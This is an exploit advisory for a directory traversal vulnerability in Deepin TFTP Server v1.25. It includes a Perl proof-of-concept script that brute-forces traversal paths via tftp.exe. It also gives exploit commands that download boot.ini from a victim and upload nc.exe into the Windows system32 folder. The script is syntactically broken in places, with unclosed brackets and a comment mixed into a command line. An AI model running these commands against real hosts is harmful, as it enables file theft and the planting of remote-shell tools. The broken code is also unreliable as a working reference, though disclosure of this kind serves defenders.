#Software : Deepin TFTP Server Directory Traversal Vulnerability Software Version : v1.25
#Vendor: Deepin.org
#Vulnerability Published : 2010-08-14
#Vulnerability Update Time :
#Status :
#Impact : Medium
#Bug Description :
#Deepin TFTP Server does not properly sanitise filenames containing directory traversal sequences that are #received from an FTP client.
#Proof Of Concept :
#!/usr/bin/perl -w
$target_ip=shift || die "usage: $0 \$target_ip\n"; @directory_traversal=( '..\tmp.txt', '..\..\tmp.txt', '..\..\..\tmp.txt', '..\..\..\..\tmp.txt', '..\..\..\..\..\tmp.txt', '..\..\..\..\..\..\tmp.txt', '..\..\..\..\..\..\..\tmp.txt'
open(TMP, ">tmp.txt");
print TMP "tmp";
foreach $dt_content (@directory_traversal){
$dt_it=`tftp.exe $target_ip put tmp.txt $dt_content`;
print "command : tftp.exe $target_ip put tmp.txt $dt_content\n";
print "$dt_it";
if($dt_it=~m/^Transferred successfully/){
print "Directory Traversal PAYLOAD is $dt_content.\n";
print "Press [ENTER] Button to continue...\n";
print "Finish!\n";
#Exploit :
#get sensitive file
#c:\windows\system32>tftp [VICTIM_IP] get ../../boot.ini boot.ini put malware c:\windows\system32>tftp [VICTIM_IP] put nc.exe ../../WINDOWS/system32/nc.exe
#Credits : This vulnerability was discovered by demonalex(at)163(dot)com Pentester/Researcher Dark2S Security Team/Venustech.GZ Branch